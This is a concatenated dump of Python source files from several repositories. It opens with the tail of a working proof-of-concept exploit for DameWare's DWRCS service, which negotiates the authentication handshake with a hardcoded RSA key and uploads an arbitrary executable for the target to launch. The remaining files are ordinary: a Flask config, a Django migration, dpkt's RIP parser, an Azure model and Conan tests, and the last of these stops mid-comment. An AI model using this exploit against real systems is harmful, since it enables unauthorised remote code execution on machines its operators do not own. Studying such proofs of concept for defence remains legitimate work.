    if len(hexstr) % 2:
        hexstr = '0' + hexstr
    return binascii.unhexlify(hexstr)
#
# MAIN
#
desc = 'This PoC attempts to upload and run a malicious dwDrvInst.exe.'
arg_parser = argparse.ArgumentParser(desc)
arg_parser.add_argument('-t', required=True, help='Target IP (Required)')
arg_parser.add_argument('-e', required=True, help='exe to send as dwDrvInst.exe (Required)')
arg_parser.add_argument('-p', type=int, default=6129, help='DWRCS.exe port, default: 6129')
args = arg_parser.parse_args()
host = args.t
port = args.p
exe = args.e
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10)
s.connect((host, port))
# Read MSG_TYPE_VERSION
res = s.recv(0x28)
(type,) = unpack_from('<I', res)
if type != 0x00001130:
print 'Received message not MSG_TYPE_VERSION'
s.clos()
sys.exit(1)
# Send MSG_TYPE_VERSION, requesting smart card auth
req = pack('<I4sddIIII', 0x1130,'\x00',12.0,0.0,4,0,0,3)
s.sendall(req)
# Read MSG_CLIENT_INFORMATION_V7
res = recvall(s,0x3af8)
(type,) = unpack_from('<I', res)
if type != 0x00011171:
print 'Received message not MSG_CLIENT_INFORMATION_V7'
s.close()
sys.exit(1)
#dump('server MSG_CLIENT_INFORMATION_V7', res)
# Pick out the datetime string
datetime = ''
i = 8
b = res[i]
while(b != '\x00'):
datetime += b
i = i + 2
b = res[i]
salt ='\x54\x40\xf4\x91\xa6\x06\x25\xbc'
prf = lambda p,s: HMAC.new(p,s,SHA512).digest()
key = KDF.PBKDF2(datetime, salt, 16, 1000, prf)
dump('Derived key from passwd ' + datetime, key)
#
# Send MSG_CLIENT_INFORMATION_V7
#
# Should be able to use the one sent by the server
req = res
s.sendall(req)
# Read MSG_TYPE_RSA_CRYPTO_C_INIT
res = recvall(s,0x1220)
(type,enc_len,) = unpack_from('<II', res)
if type != 0x000105b8:
print 'Received message not MSG_TYPE_RSA_CRYPTO_C_INIT'
s.close()
sys.exit(1)
#dump('server MSG_TYPE_RSA_CRYPTO_C_INIT', res)
# Encrypted params at offset 0x100c
crypt = res[0x100c:0x100c+enc_len]
iv ='\x54\x40\xF4\x91\xA6\x06\x25\xBC\x8E\x84\x56\xD6\xCB\xB7\x40\x59'
params = aes_cbc_decrypt(crypt,key,iv)
dump('Encrypted server MSG_TYPE_RSA_CRYPTO_C_INIT params', crypt)
dump('Decrypted server MSG_TYPE_RSA_CRYPTO_C_INIT params', params)
# Send MSG_TYPE_RSA_CRYPTO_C_INIT
# Should be able to use the one sent by the server
req = res
s.sendall(req)
# Read MSG_000105b9 (1)
res = recvall(s,0x2c2c)
(type,) = unpack_from('<I', res)
if type != 0x000105b9:
print 'Received message not MSG_000105b9'
s.close()
sys.exit(1)
#dump('server MSG_000105b9 (1)', res)
# Get server DH public key
(pubkey_len,) = unpack_from('<I', res, 0x140c)
srv_pubkey = res[0x100c:0x100c+pubkey_len]
dump('server DH public key', srv_pubkey)
srv_pubkey = int(binascii.hexlify(srv_pubkey), base=16)
dh_prime = 0xF51FFB3C6291865ECDA49C30712DB07B
dh_gen = 3
clt_privkey = int(binascii.hexlify(os.urandom(16)), base=16)
clt_pubkey = int2bin(pow(dh_gen, clt_privkey, dh_prime))
dump('client DH public key', clt_pubkey)
shared_secret = int2bin(pow(srv_pubkey, clt_privkey, dh_prime))
dump('DH shared secret', shared_secret)
# Compute the sum of the bytes in the shared secret
clt_sum = 0
for b in shared_secret: clt_sum = clt_sum + ord(b)
buf = list(res);
# Send MSG_000105b9 (1)
# Fill in client DH public key and length
buf[0x1418:0x1418+len(clt_pubkey)] = clt_pubkey
buf[0x1818:0x1818 + 4] = pack('<I',len(clt_pubkey))
req = ''.join(buf)
#dump('client MSG_000105b9 (1)', req)
s.sendall(req)
#
# Server send back the length and addsum of the shared secret
#
res = recvall(s,0x2c2c)
(type,) = unpack_from('<I', res)
if type != 0x000105b9:
print 'Received message not MSG_000105b9'
s.close()
sys.exit(1)
#dump('server MSG_000105b9 (2)', res)
(srv_sum,) = unpack_from('<I', res, 0x1820)
# Byte sum of the shared secret should match on the client and server
print 'client-computed sum of the DH shared secret: 0x%x' % (clt_sum)
print 'server-computed sum of the DH shared secret: 0x%x' % (srv_sum)
#
# 1024-byte RSA key
#
rsa_key = "\x30\x82\x02\x5D\x02\x01\x00\x02\x81\x81\x00\xAD\x8C\x81\x7B\xC7"
rsa_key += "\x0B\xCA\xF7\x50\xBB\xD3\xA0\x7D\xC0\xA4\x31\xE3\xDD\x28\xCE\x99"
rsa_key += "\x78\x05\x92\x94\x41\x03\x85\xF5\xF0\x24\x77\x9B\xB1\xA6\x1B\xC7"
rsa_key += "\x9A\x79\x4D\x69\xAE\xCB\xC1\x5A\x88\xB6\x62\x9F\x93\xF5\x4B\xCA"
rsa_key += "\x86\x6C\x23\xAE\x4F\x43\xAC\x81\x7C\xD9\x81\x7E\x30\xB4\xCC\x78"
rsa_key += "\x6B\x77\xD0\xBB\x20\x1C\x35\xBE\x4D\x12\x44\x4A\x63\x14\xEC\xFC"
rsa_key += "\x9A\x86\xA2\x4F\x98\xB9\xB5\x49\x5F\x6C\x37\x08\xC0\x1D\xD6\x33"
rsa_key += "\x67\x97\x7C\x0D\x36\x62\x70\x25\xD8\xD4\xE8\x44\x61\x59\xE3\x61"
rsa_key += "\xCA\xB8\x9E\x14\x14\xAA\x2F\xCB\x89\x10\x1B\x02\x03\x01\x00\x01"
rsa_key += "\x02\x81\x81\x00\xA1\x60\xCF\x22\xD7\x33\x3B\x18\x00\x85\xB7\xC3"
rsa_key += "\x3C\x4C\x3F\x22\x79\x3D\xB4\xED\x70\x3D\xF0\x08\x9E\x3D\x5A\x56"
rsa_key += "\x5E\x1C\x60\xFC\xAB\xD5\x64\x9D\xDE\x5C\xE1\x41\x3F\xED\x9F\x60"
rsa_key += "\x7B\x9C\x36\xE4\xBC\x78\xEC\x16\xFF\x0B\x42\x51\x67\x8C\x23\x64"
rsa_key += "\xAC\xBF\xF8\xCB\xED\xE8\x46\x66\x40\x8F\x70\x46\x10\x9C\x63\x07"
rsa_key += "\x74\x33\x64\x26\x25\xA6\x34\x43\x8F\x95\xA9\x70\xD1\x40\x69\x0B"
rsa_key += "\xF8\xC8\x62\x5F\x8D\xE8\x8F\xC4\x46\xBF\x09\xAB\x83\x68\xFE\x5F"
rsa_key += "\x2D\x2D\x3B\xD9\xF5\xD5\x32\x34\xBC\x37\x17\xCB\x13\x50\x96\x6E"
rsa_key += "\x26\x82\xC2\x39\x02\x41\x00\xD9\x5D\x24\x6C\x3B\xA7\x85\x7F\xD9"
rsa_key += "\x6A\x7E\xDC\x4E\xDC\x67\x10\x1D\x6E\xAC\x19\xA9\xA3\xF7\xC0\x27"
rsa_key += "\x0A\xC3\x03\x94\xB5\x16\x54\xFC\x27\x3B\x41\xBC\x52\x80\x6B\x14"
rsa_key += "\x01\x1D\xAC\x9F\xC0\x04\xB9\x26\x01\x96\x68\xD8\xB9\x9A\xAD\xD8"
rsa_key += "\xA1\x96\x84\x93\xA2\xD8\xAF\x02\x41\x00\xCC\x65\x9E\xA8\x08\x7B"
rsa_key += "\xD7\x3D\x61\xD2\xB3\xCF\xC6\x4F\x0C\x65\x25\x1E\x68\xC6\xAC\x04"
rsa_key += "\xD0\xC4\x3A\xA7\x9E\xEB\xDE\xD9\x20\x9A\xCE\x92\x77\xB7\x84\xC0"
rsa_key += "\x1B\x42\xB4\xCA\xBE\xFC\x20\x88\x68\x2D\x0F\xC4\x6D\x44\x28\xA0"
rsa_key += "\x40\x0F\x88\x25\x08\x12\x51\x86\x42\x55\x02\x41\x00\xA4\x52\x0D"
rsa_key += "\x9E\xE4\xDA\x17\xCA\x37\x0A\x93\x2C\xE9\x51\x25\x78\xC1\x47\x51"
rsa_key += "\x43\x75\x43\x47\xA0\x33\xE3\xA6\xD9\xA6\x29\xDF\xE0\x0F\x5F\x79"
rsa_key += "\x24\x90\xC1\xAD\xE3\x45\x14\x32\xE2\xB5\x41\xEC\x50\x2B\xB3\x37"
rsa_key += "\x89\xBB\x8D\x54\xA9\xE8\x03\x00\x4E\xE9\x6D\x4A\x71\x02\x40\x4E"
rsa_key += "\x23\x73\x19\xCD\xD4\x7A\x1E\x6F\x2D\x3B\xAC\x6C\xA5\x7F\x99\x93"
rsa_key += "\x2D\x22\xE5\x00\x91\xFE\xB5\x65\xAE\xFA\xE4\x35\x17\x50\x8D\x9D"
rsa_key += "\xF7\x04\x69\x56\x08\x92\xE3\x57\x76\x42\xB8\xE4\x3F\x01\x84\x68"
rsa_key += "\x88\xB1\x34\xE3\x4B\x0F\xF2\x60\x1B\xB8\x10\x38\xB6\x58\xD9\x02"
rsa_key += "\x40\x65\xB1\xDE\x13\xAB\xAA\x01\x0D\x54\x53\x86\x85\x08\x5B\xC8"
rsa_key += "\xC0\x06\x7B\xBA\x51\xC6\x80\x0E\xA4\xD2\xF5\x63\x5B\x3C\x3F\xD1"
rsa_key += "\x30\x66\xA4\x2B\x60\x87\x9D\x04\x5F\x16\xEC\x51\x02\x9F\x53\xAA"
rsa_key += "\x22\xDF\xB4\x92\x01\x0E\x9B\xA6\x6C\x5E\x9D\x2F\xD8\x6B\x60\xD7"
rsa_key += "\x47"
#
# Public part of the RSA key
#
rsa_pubkey = "\x30\x81\x89\x02\x81\x81\x00\xAD\x8C\x81\x7B\xC7\x0B\xCA\xF7\x50"
rsa_pubkey += "\xBB\xD3\xA0\x7D\xC0\xA4\x31\xE3\xDD\x28\xCE\x99\x78\x05\x92\x94"
rsa_pubkey += "\x41\x03\x85\xF5\xF0\x24\x77\x9B\xB1\xA6\x1B\xC7\x9A\x79\x4D\x69"
rsa_pubkey += "\xAE\xCB\xC1\x5A\x88\xB6\x62\x9F\x93\xF5\x4B\xCA\x86\x6C\x23\xAE"
rsa_pubkey += "\x4F\x43\xAC\x81\x7C\xD9\x81\x7E\x30\xB4\xCC\x78\x6B\x77\xD0\xBB"
rsa_pubkey += "\x20\x1C\x35\xBE\x4D\x12\x44\x4A\x63\x14\xEC\xFC\x9A\x86\xA2\x4F"
rsa_pubkey += "\x98\xB9\xB5\x49\x5F\x6C\x37\x08\xC0\x1D\xD6\x33\x67\x97\x7C\x0D"
rsa_pubkey += "\x36\x62\x70\x25\xD8\xD4\xE8\x44\x61\x59\xE3\x61\xCA\xB8\x9E\x14"
rsa_pubkey += "\x14\xAA\x2F\xCB\x89\x10\x1B\x02\x03\x01\x00\x01"
rsa_privkey = RSA.importKey(rsa_key)
hash = SHA512.new(shared_secret)
signer = PKCS1_v1_5.new(rsa_privkey)
rsa_sig = signer.sign(hash)
dump('RSA signature of the DH shared secret', rsa_sig)
buf = list(res)
# Fill in the length and sum of the client-computed DH shared secret
buf[0x1410: 0x1410 + 4] = pack('<I',len(shared_secret))
buf[0x1414: 0x1414 + 4] = pack('<I',clt_sum)
# Fill in the RSA signature of the DH shared secret
buf[0x1824: 0x1824 + len(rsa_sig)] = rsa_sig
buf[0x2024: 0x2024 + 4] = pack('<I', len(rsa_sig))
# Fill in the RSA public key
buf[0x2028: 0x2028 + len(rsa_pubkey)] = rsa_pubkey
buf[0x2828: 0x2828 + 4] = pack('<I', len(rsa_pubkey))
req = ''.join(buf)
#dump('client MSG_000105b9 (2)', req)
s.sendall(req)
# Server should send MSG_REGISTRATION_INFORMATION
res = recvall(s,0xc50)
(type,) = unpack_from('<I', res)
if type != 0x0000b004:
print 'Received message not MSG_REGISTRATION_INFORMATION'
s.close()
sys.exit(1)
#dump('server MSG_REGISTRATION_INFORMATION', res)
# Send our MSG_REGISTRATION_INFORMATION
# Should be able to use the one sent by the server
req = res
s.sendall(req)
# Server should send MSG_SOCKET_ADD
res = recvall(s,0x224)
(type,) = unpack_from('<I', res)
if type != 0x00010626:
print 'Received message not MSG_SOCKET_ADD'
s.close()
sys.exit(1)
#dump('server MSG_SOCKET_ADD', res)
# Server should MSG_D6E2
res = recvall(s,0x1438)
(type,) = unpack_from('<I', res)
if type != 0x0000D6E2:
print 'Received message not MSG_10626'
s.close()
sys.exit(1)
#dump('server MSG_D6E2', res)
# Send our MSG_D6E2
req = res
s.sendall(req)
# Server should send a MSG_SMARTCARD_COMMAND with no data part
res = xrecv(s)
(type,) = unpack_from('<I', res)
if type != 0x0000D6F6:
print 'Received message not MSG_SMARTCARD_COMMAND'
s.close()
sys.exit(1)
#dump('server MSG_SMARTCARD_COMMAND', res)
# Server should send another MSG_SMARTCARD_COMMAND with no data part
res = xrecv(s)
(type,) = unpack_from('<I', res)
if type != 0x0000D6F6:
print 'Received message not MSG_SMARTCARD_COMMAND'
s.close()
sys.exit(1)
#dump('server MSG_SMARTCARD_COMMAND', res)
# Send our dwDrvInst.exe with a MSG_SMARTCARD_COMMAND
print 'Sending malicious dwDrvInst.exe ...'
with open(exe,'rb') as f: data = f.read()
req = pack('<III', 0xD6F6,2, len(data))
req += data;
s.sendall(req)
print 'Please check if dwDrvInst.exe is launched on %s.\n' % (host)
# Any response?
print 'Checking any response from the server...'
res = s.recv(0x4000)
dump('Response after sending malicious dwDrvInst.exe', res)
| 32.351648 | 92 | 0.701681 |
5c92783e89b405a5833edfdba92d81a88bb57113 | 546 | py | Python | config.py | davidlares/davidTasks | da9ea03b6697e48a463c8e8145927f5afc519dbd | [
"MIT"
] | null | null | null | config.py | davidlares/davidTasks | da9ea03b6697e48a463c8e8145927f5afc519dbd | [
"MIT"
] | null | null | null | config.py | davidlares/davidTasks | da9ea03b6697e48a463c8e8145927f5afc519dbd | [
"MIT"
] | null | null | null | # global config
# Application configuration objects; attributes are read as settings
# (presumably via Flask's ``app.config.from_object`` -- confirm in the app factory).

class Config:
    """Settings shared by every environment."""
    SECRET_KEY = 'mysecretkey'  # required for CSRF token generation


class DevelopmentConfig(Config):
    """Local-development settings: debug on, local MySQL, Gmail SMTP."""
    DEBUG = True
    SQLALCHEMY_DATABASE_URI = 'mysql://root:@localhost/flask_tasks'
    SQLALCHEMY_TRACK_MODIFICATIONS = False
    MAIL_SERVER = 'smtp.googlemail.com'
    MAIL_PORT = 587
    MAIL_USE_TLS = True
    MAIL_USERNAME = '[email_account]@gmail.com'  # the account must permit SMTP access
    MAIL_PASSWORD = 'XXXXXXXXX'  # placeholder -- better sourced from an env variable


# Registry used to pick a configuration class by name.
config = dict(
    development=DevelopmentConfig,
    default=DevelopmentConfig,
)
| 27.3 | 67 | 0.71978 |
3963fe07ba384b0e929e643640b9e8bb1848c7df | 78 | py | Python | mypytorch.py | congnb/mypython | 893b3390b8d6cf803b8ae15bf5331e74e6faf04a | [
"MIT"
] | 1 | 2020-08-08T05:06:25.000Z | 2020-08-08T05:06:25.000Z | mypytorch.py | congnb/mypython | 893b3390b8d6cf803b8ae15bf5331e74e6faf04a | [
"MIT"
] | null | null | null | mypytorch.py | congnb/mypython | 893b3390b8d6cf803b8ae15bf5331e74e6faf04a | [
"MIT"
] | 1 | 2020-08-08T08:20:38.000Z | 2020-08-08T08:20:38.000Z | import torch
print (torch.cuda.is_available())
x = torch.rand(5, 3)
print(x) | 13 | 33 | 0.705128 |
6e04dc4fe7132fc97add149f5c947853f3363ddc | 2,098 | py | Python | Chatops/user/migrations/0003_auto_20200129_1940.py | kkirsche/mattermost-chatops | 800f4483245e29790ae5578bc5fad2f9aad6667a | [
"Apache-2.0"
] | 4 | 2020-04-25T01:44:17.000Z | 2022-01-23T15:03:42.000Z | Chatops/user/migrations/0003_auto_20200129_1940.py | kkirsche/mattermost-chatops | 800f4483245e29790ae5578bc5fad2f9aad6667a | [
"Apache-2.0"
] | 6 | 2021-03-30T14:33:01.000Z | 2021-09-22T19:49:36.000Z | Chatops/user/migrations/0003_auto_20200129_1940.py | kkirsche/mattermost-chatops | 800f4483245e29790ae5578bc5fad2f9aad6667a | [
"Apache-2.0"
] | 1 | 2020-03-23T12:34:47.000Z | 2020-03-23T12:34:47.000Z | # Generated by Django 3.0.2 on 2020-01-29 19:40
import datetime
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated schema migration: replaces the old ``User`` model with
    # ``BotUser`` and introduces ``Instance`` plus the ``InsatnceAccess``
    # (sic -- the typo is frozen into migration history) join model.

    dependencies = [
        ('user', '0002_auto_20200127_1704'),
    ]

    operations = [
        migrations.CreateModel(
            name='BotUser',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('user_id', models.CharField(max_length=250)),
                ('name', models.CharField(max_length=250, null=True)),
                ('email', models.CharField(max_length=250, null=True)),
                ('roles', models.CharField(max_length=250, null=True)),
                ('channel_id', models.CharField(max_length=250, null=True)),
                # NOTE(review): the default is a fixed timestamp baked in at
                # makemigrations time, not "now at insert time" -- confirm the
                # model uses auto_now_add/default=timezone.now if that was intended.
                ('created_date', models.DateTimeField(default=datetime.datetime(2020, 1, 29, 19, 40, 19, 143129))),
                # Self-referential FK: each bot user may point at a manager.
                ('manager', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='user.BotUser')),
            ],
        ),
        migrations.CreateModel(
            name='InsatnceAccess',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
            ],
        ),
        migrations.CreateModel(
            name='Instance',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=250)),
            ],
        ),
        migrations.DeleteModel(
            name='User',
        ),
        # FKs are added after both endpoint models exist.
        migrations.AddField(
            model_name='insatnceaccess',
            name='instance_id',
            field=models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='user.Instance'),
        ),
        migrations.AddField(
            model_name='insatnceaccess',
            name='user_id',
            field=models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='user.BotUser'),
        ),
    ]
| 38.145455 | 115 | 0.580076 |
83f29f62e27fa10253511af38a1ebf18e8bacb7a | 1,963 | py | Python | dpkt/rip.py | lkash/test | 5631eeaaa7e1bd5f6ce7b3c08f1c9b6b7fc2ec1c | [
"BSD-3-Clause"
] | null | null | null | dpkt/rip.py | lkash/test | 5631eeaaa7e1bd5f6ce7b3c08f1c9b6b7fc2ec1c | [
"BSD-3-Clause"
] | null | null | null | dpkt/rip.py | lkash/test | 5631eeaaa7e1bd5f6ce7b3c08f1c9b6b7fc2ec1c | [
"BSD-3-Clause"
] | null | null | null | # $Id: rip.py 23 2006-11-08 15:45:33Z dugsong $
# -*- coding: utf-8 -*-
"""Routing Information Protocol."""
import dpkt
# RIP v2 - RFC 2453
# http://tools.ietf.org/html/rfc2453
REQUEST = 1
RESPONSE = 2
class RIP(dpkt.Packet):
    """RIP v2 message: 4-byte common header followed by 20-byte entries.

    After ``unpack``, ``self.rtes`` holds the parsed RTE route entries and
    ``self.auth`` holds the optional authentication entry (address family
    0xFFFF), or None when absent.
    """
    __hdr__ = (
        ('cmd', 'B', REQUEST),
        ('v', 'B', 2),
        ('rsvd', 'H', 0)
    )

    def unpack(self, buf):
        # Parse the fixed header, then consume the body in 20-byte entries.
        dpkt.Packet.unpack(self, buf)
        rtes = []
        self.auth = None
        while self.data:
            rte = RTE(self.data[:20])
            if rte.family == 0xFFFF:
                # An all-ones family field marks an authentication entry.
                self.auth = Auth(self.data[:20])
            else:
                rtes.append(rte)
            self.data = self.data[20:]
        self.data = self.rtes = rtes

    def __len__(self):
        # Fixed: the accumulator used to be named ``len``, shadowing the
        # builtin, so ``len(self.auth)`` called an int and raised TypeError
        # whenever an authentication entry was present.
        n = self.__hdr_len__
        if self.auth:
            n += len(self.auth)
        n += sum(map(len, self.rtes))
        return n

    def __str__(self):
        # Serialize header + optional auth entry + every route entry.
        auth = ''
        if self.auth:
            auth = str(self.auth)
        return self.pack_hdr() + auth + ''.join(map(str, self.rtes))
class RTE(dpkt.Packet):
    # Route Table Entry: 20 bytes (see the RFC 2453 reference noted above).
    __hdr__ = (
        ('family', 'H', 2),      # address family identifier (0xFFFF => auth entry)
        ('route_tag', 'H', 0),
        ('addr', 'I', 0),        # destination address
        ('subnet', 'I', 0),      # subnet mask
        ('next_hop', 'I', 0),
        ('metric', 'I', 1)       # route metric
    )
class Auth(dpkt.Packet):
    # Authentication entry: same 20-byte footprint as an RTE, distinguished
    # by the all-ones value in the position of the address-family field.
    __hdr__ = (
        ('rsvd', 'H', 0xFFFF),   # 0xFFFF marks this entry as authentication
        ('type', 'H', 2),        # authentication type
        ('auth', '16s', 0)       # 16-byte authentication value
    )
# Sample RIP payload used by the self-tests below: a RESPONSE containing two
# route entries and no authentication entry.
__s = '\x02\x02\x00\x00\x00\x02\x00\x00\x01\x02\x03\x00\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x00\x00\xc0\xa8\x01\x08\xff\xff\xff\xfc\x00\x00\x00\x00\x00\x00\x00\x01'


def test_rtp_pack():
    # Round-trip: parsing and re-serializing reproduces the input bytes.
    r = RIP(__s)
    assert (__s == str(r))


def test_rtp_unpack():
    # Field-level checks on the parsed route entries.
    r = RIP(__s)
    assert (r.auth is None)
    assert (len(r.rtes) == 2)
    rte = r.rtes[1]
    assert (rte.family == 2)
    assert (rte.route_tag == 0)
    assert (rte.metric == 1)


if __name__ == '__main__':
    test_rtp_pack()
    test_rtp_unpack()
    print 'Tests Successful...'  # Python 2 print statement; this file is py2-only
440da8c529cc6ca50808106bbae128c51dd699fb | 1,365 | py | Python | azure-iot-hub/azure/iot/hub/protocol/models/registry_statistics.py | danewalton/azure-iot-sdk-python | addc82a8c28478738602bd698acdaf1a16dc39b4 | [
"MIT"
] | 366 | 2016-12-02T20:38:05.000Z | 2022-03-29T10:08:14.000Z | azure-iot-hub/azure/iot/hub/protocol/models/registry_statistics.py | danewalton/azure-iot-sdk-python | addc82a8c28478738602bd698acdaf1a16dc39b4 | [
"MIT"
] | 640 | 2016-12-16T21:59:48.000Z | 2022-03-30T20:17:52.000Z | azure-iot-hub/azure/iot/hub/protocol/models/registry_statistics.py | danewalton/azure-iot-sdk-python | addc82a8c28478738602bd698acdaf1a16dc39b4 | [
"MIT"
] | 371 | 2016-11-16T16:06:04.000Z | 2022-03-31T10:10:57.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class RegistryStatistics(Model):
    """RegistryStatistics.

    Device-count statistics for an IoT Hub identity registry.

    :param total_device_count: The total number of devices registered for the
     IoT Hub.
    :type total_device_count: long
    :param enabled_device_count: The number of currently enabled devices.
    :type enabled_device_count: long
    :param disabled_device_count: The number of currently disabled devices.
    :type disabled_device_count: long
    """

    # Maps Python attribute names to wire (JSON) keys for msrest serialization.
    _attribute_map = {
        "total_device_count": {"key": "totalDeviceCount", "type": "long"},
        "enabled_device_count": {"key": "enabledDeviceCount", "type": "long"},
        "disabled_device_count": {"key": "disabledDeviceCount", "type": "long"},
    }

    def __init__(self, **kwargs):
        super(RegistryStatistics, self).__init__(**kwargs)
        # Counts that were not supplied default to None rather than 0.
        self.total_device_count = kwargs.get("total_device_count")
        self.enabled_device_count = kwargs.get("enabled_device_count")
        self.disabled_device_count = kwargs.get("disabled_device_count")
| 40.147059 | 80 | 0.632967 |
75f6a38d3c07c3bc1d8ac2a08e89de2316eb496b | 2,220 | py | Python | tests/test_as_discrete.py | finalelement/MONAI | 8e8e1b391fa649d1227087164dba208008d00bc4 | [
"Apache-2.0"
] | null | null | null | tests/test_as_discrete.py | finalelement/MONAI | 8e8e1b391fa649d1227087164dba208008d00bc4 | [
"Apache-2.0"
] | null | null | null | tests/test_as_discrete.py | finalelement/MONAI | 8e8e1b391fa649d1227087164dba208008d00bc4 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 - 2021 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from parameterized import parameterized
from monai.transforms import AsDiscrete
from tests.utils import TEST_NDARRAYS, assert_allclose
TEST_CASES = []
# One copy of every case per array constructor ``p`` in TEST_NDARRAYS
# (backend wrappers from tests.utils -- presumably numpy/torch; confirm there).
# Each case is [AsDiscrete kwargs, input, expected output, expected shape].
for p in TEST_NDARRAYS:
    # argmax over the channel dim, no one-hot: (2,1,2) logits -> (1,1,2) labels
    TEST_CASES.append(
        [
            {"argmax": True, "to_onehot": False, "num_classes": None, "threshold_values": False, "logit_thresh": 0.5},
            p([[[0.0, 1.0]], [[2.0, 3.0]]]),
            p([[[1.0, 1.0]]]),
            (1, 1, 2),
        ]
    )
    # argmax followed by one-hot re-expansion to 2 channels
    TEST_CASES.append(
        [
            {"argmax": True, "to_onehot": True, "num_classes": 2, "threshold_values": False, "logit_thresh": 0.5},
            p([[[0.0, 1.0]], [[2.0, 3.0]]]),
            p([[[0.0, 0.0]], [[1.0, 1.0]]]),
            (2, 1, 2),
        ]
    )
    # thresholding only, at logit_thresh=0.6
    TEST_CASES.append(
        [
            {"argmax": False, "to_onehot": False, "num_classes": None, "threshold_values": True, "logit_thresh": 0.6},
            p([[[0.0, 1.0], [2.0, 3.0]]]),
            p([[[0.0, 1.0], [1.0, 1.0]]]),
            (1, 2, 2),
        ]
    )
    # scalar label -> one-hot vector of length 3
    TEST_CASES.append([{"argmax": False, "to_onehot": True, "num_classes": 3}, p(1), p([0.0, 1.0, 0.0]), (3,)])
    # rounding mode: values rounded to the nearest integer
    TEST_CASES.append(
        [{"rounding": "torchrounding"}, p([[[0.123, 1.345], [2.567, 3.789]]]), p([[[0.0, 1.0], [3.0, 4.0]]]), (1, 2, 2)]
    )
class TestAsDiscrete(unittest.TestCase):
    # Parameterized over TEST_CASES: each case supplies the transform kwargs,
    # the input array, the expected output and the expected output shape.
    @parameterized.expand(TEST_CASES)
    def test_value_shape(self, input_param, img, out, expected_shape):
        # Apply the transform, then check values (within tolerance) and shape.
        result = AsDiscrete(**input_param)(img)
        assert_allclose(result, out, rtol=1e-3)
        self.assertTupleEqual(result.shape, expected_shape)


if __name__ == "__main__":
    unittest.main()
| 34.153846 | 120 | 0.593243 |
32a86f5761ccff29b88325b331bccc7231cb531e | 14,047 | py | Python | conans/test/unittests/model/ref_test.py | Wonders11/conan | 28ec09f6cbf1d7e27ec27393fd7bbc74891e74a8 | [
"MIT"
] | 1 | 2019-11-04T17:23:09.000Z | 2019-11-04T17:23:09.000Z | conans/test/unittests/model/ref_test.py | Wonders11/conan | 28ec09f6cbf1d7e27ec27393fd7bbc74891e74a8 | [
"MIT"
] | 1 | 2020-11-05T16:16:49.000Z | 2020-11-05T16:16:49.000Z | conans/test/unittests/model/ref_test.py | Mattlk13/conan | 005fc53485557b0a570bb71670f2ca9c66082165 | [
"MIT"
] | null | null | null | import unittest
import six
from conans.errors import ConanException
from conans.model.ref import ConanFileReference, ConanName, InvalidNameException, PackageReference, \
check_valid_ref, get_reference_fields
class RefTest(unittest.TestCase):
    """Parsing/printing round-trips for ConanFileReference and PackageReference."""

    def test_basic(self):
        # name/version@user/channel parses into its four fields, revision is
        # None by default, and str() reproduces the input.
        ref = ConanFileReference.loads("opencv/2.4.10@lasote/testing")
        self.assertEqual(ref.name, "opencv")
        self.assertEqual(ref.version, "2.4.10")
        self.assertEqual(ref.user, "lasote")
        self.assertEqual(ref.channel, "testing")
        self.assertEqual(ref.revision, None)
        self.assertEqual(str(ref), "opencv/2.4.10@lasote/testing")

        # Underscores are valid in both the name and the user.
        ref = ConanFileReference.loads("opencv_lite/2.4.10@phil_lewis/testing")
        self.assertEqual(ref.name, "opencv_lite")
        self.assertEqual(ref.version, "2.4.10")
        self.assertEqual(ref.user, "phil_lewis")
        self.assertEqual(ref.channel, "testing")
        self.assertEqual(ref.revision, None)
        self.assertEqual(str(ref), "opencv_lite/2.4.10@phil_lewis/testing")

        # Dashes and a leading digit are valid in the user field.
        ref = ConanFileReference.loads("opencv/2.4.10@3rd-party/testing")
        self.assertEqual(ref.name, "opencv")
        self.assertEqual(ref.version, "2.4.10")
        self.assertEqual(ref.user, "3rd-party")
        self.assertEqual(ref.channel, "testing")
        self.assertEqual(ref.revision, None)
        self.assertEqual(str(ref), "opencv/2.4.10@3rd-party/testing")

        # A trailing "#<rev>" populates the revision field.
        ref = ConanFileReference.loads("opencv/2.4.10@3rd-party/testing#rev1")
        self.assertEqual(ref.revision, "rev1")

    def test_errors(self):
        # Malformed references raise ConanException.
        self.assertRaises(ConanException, ConanFileReference.loads, "")
        # With validate=False, an incomplete reference parses with user and
        # channel left unset.
        self.assertIsNone(ConanFileReference.loads("opencv/2.4.10@", validate=False).channel)
        self.assertIsNone(ConanFileReference.loads("opencv/2.4.10@", validate=False).user)
        self.assertRaises(ConanException, ConanFileReference.loads, "opencv/2.4.10@lasote")
        self.assertRaises(ConanException, ConanFileReference.loads, "opencv??/2.4.10@laso/testing")
        self.assertRaises(ConanException, ConanFileReference.loads, "opencv/2.4.10 @ laso/testing")
        self.assertRaises(ConanException, ConanFileReference.loads, "o/2.4.10@laso/testing")
        self.assertRaises(ConanException, ConanFileReference.loads, ".opencv/2.4.10@lasote/testing")
        self.assertRaises(ConanException, ConanFileReference.loads, "o/2.4.10 @ lasote/testing")
        self.assertRaises(ConanException, ConanFileReference.loads, "lib/1.0@user&surname/channel")
        # NOTE(review): '%' and '*' have equal precedence, so each of the four
        # expressions below evaluates as ("..." % "A") * 40 -- the formatted
        # string repeated 40 times -- not a single 40-char field. The inputs
